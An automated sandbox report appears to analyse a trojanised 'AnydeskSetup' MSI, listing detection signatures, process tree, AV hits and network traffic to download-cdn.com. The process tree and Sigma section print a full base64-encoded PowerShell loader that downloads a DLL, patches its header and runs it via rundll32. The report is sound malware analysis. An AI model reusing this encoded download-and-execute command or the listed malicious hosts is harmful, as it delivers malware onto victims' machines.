Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AnydeskSetup_26b30163.msi

Overview

General Information

Sample Name:AnydeskSetup_26b30163.msi
Analysis ID:787624
MD5:c4e9e9a06001c6197de2ea2fec3d2214
SHA1:369006350f6b4c43c7f51a90deb5e73a20156b55
SHA256:e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MalDoc
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Antivirus detection for URL or domain
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Encrypted powershell cmdline option found
Powershell drops PE file
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains functionality to retrieve information about pressed keystrokes
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Found evasive API chain (may stop execution after accessing registry keys)

Classification

  • System is w10x64
  • msiexec.exe (PID: 8 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AnydeskSetup_26b30163.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 4312 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 1592 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188B MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • MSI5344.tmp (PID: 2904 cmdline: "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA== MD5: 6AAC525CFCDD6D3978C451BBA2BB9CB3)
  • powershell.exe (PID: 4440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 2088 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 2460 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 5176 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3720 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 5064 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3584 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
AnydeskSetup_26b30163.msiJoeSecurity_MalDocYara detected MalDocJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\Installer\4641a8.msiJoeSecurity_MalDocYara detected MalDocJoe Security

      Data Obfuscation

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer , CommandLine: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer , CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4440, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer , ProcessId: 2088, ProcessName: rundll32.exe
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://download-cdn.com/download.php?f=Ldrp.dll&from=AnydeskSetup_26b30163.msiAvira URL Cloud: Label: malware
      Source: https://download-cdn.com/pload/26b30163Avira URL Cloud: Label: malware
      Source: http://download-cdn.comAvira URL Cloud: Label: malware
      Source: https://download-cdn.comAvira URL Cloud: Label: malware
      Source: https://download-cdn.com/pload/Avira URL Cloud: Label: malware
      Source: https://download-cdn.com/pload/SOFTWAREAvira URL Cloud: Label: malware
      Source: https://download-cdn.com/download.php?f=Ldrp.dAvira URL Cloud: Label: malware
      Source: download-cdn.comVirustotal: Detection: 14%Perma Link
      Source: 4.2.powershell.exe.11a11318758.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: unknownHTTPS traffic detected: 152.89.196.75:443 -> 192.168.2.4:49695 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 152.89.196.75:443 -> 192.168.2.4:49696 version: TLS 1.2
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb> source: MSI5344.tmp, 00000003.00000000.334329335.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, MSI5344.tmp, 00000003.00000002.336937187.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSI5344.tmp, 00000003.00000000.334329335.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, MSI5344.tmp, 00000003.00000002.336937187.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr
      Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A07390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,7_2_04A07390
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A07750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose,7_2_04A07750
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A03AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose,7_2_04A03AA0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A03D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose,7_2_04A03D50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC7750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose,9_2_00FC7750
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC3AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose,9_2_00FC3AA0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC7390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,9_2_00FC7390
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC3D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose,9_2_00FC3D50

      Networking

      barindex
      Source: Yara matchFile source: AnydeskSetup_26b30163.msi, type: SAMPLE
      Source: Yara matchFile source: C:\Windows\Installer\4641a8.msi, type: DROPPED
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 152.89.196.75 443Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 64.190.113.123 443
      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: download-cdn.com
      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
      Source: global trafficHTTP traffic detected: GET /download.php?f=Ldrp.dll&from=AnydeskSetup_26b30163.msi HTTP/1.1Host: download-cdn.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /pload/26b30163 HTTP/1.1Host: download-cdn.comCache-Control: no-cache
      Source: unknownHTTPS traffic detected: 152.89.196.75:443 -> 192.168.2.4:49695 version: TLS 1.0
      Source: Joe Sandbox ViewASN Name: NEXTVISIONGB NEXTVISIONGB
      Source: Joe Sandbox ViewASN Name: TRAVELCLICKCORP1US TRAVELCLICKCORP1US
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: powershell.exe, 00000004.00000002.380126921.0000011A282AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: powershell.exe, 00000004.00000002.350417258.0000011A112A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download-cdn.com
      Source: powershell.exe, 00000004.00000002.376308789.0000011A201BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
      Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.350417258.0000011A10161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://t2.symcb.com0
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crl0
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crt0
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: http://tl.symcd.com0&
      Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000004.00000002.350417258.0000011A10361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A10161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A1128E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download-cdn.com
      Source: powershell.exe, 00000004.00000002.350417258.0000011A11207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download-cdn.com/download.php?f=Ldrp.d
      Source: powershell.exe, 00000004.00000002.350417258.0000011A10361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A11207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download-cdn.com/download.php?f=Ldrp.dll&from=AnydeskSetup_26b30163.msi
      Source: rundll32.exe, 00000007.00000002.380471094.000000001001D000.00000004.00000001.01000000.00000008.sdmp, rundll32.exe, 00000009.00000002.402040260.000000001001D000.00000004.00000001.01000000.00000008.sdmp, rundll32.exe, 0000000B.00000002.846933227.000000001001D000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://download-cdn.com/pload/
      Source: rundll32.exe, 00000007.00000002.380471094.000000001001D000.00000004.00000001.01000000.00000008.sdmp, rundll32.exe, 00000009.00000002.402040260.000000001001D000.00000004.00000001.01000000.00000008.sdmp, rundll32.exe, 0000000B.00000002.846933227.000000001001D000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://download-cdn.com/pload/SOFTWARE
      Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.350417258.0000011A10DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.drString found in binary or memory: https://litesoft.com/ARPURLINFOABOUTARPURLUPDATEINFOButtonText_Repair&RepairAiPreferFastOem1ProductL
      Source: powershell.exe, 00000004.00000002.376308789.0000011A201BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: https://www.advancedinstaller.com
      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
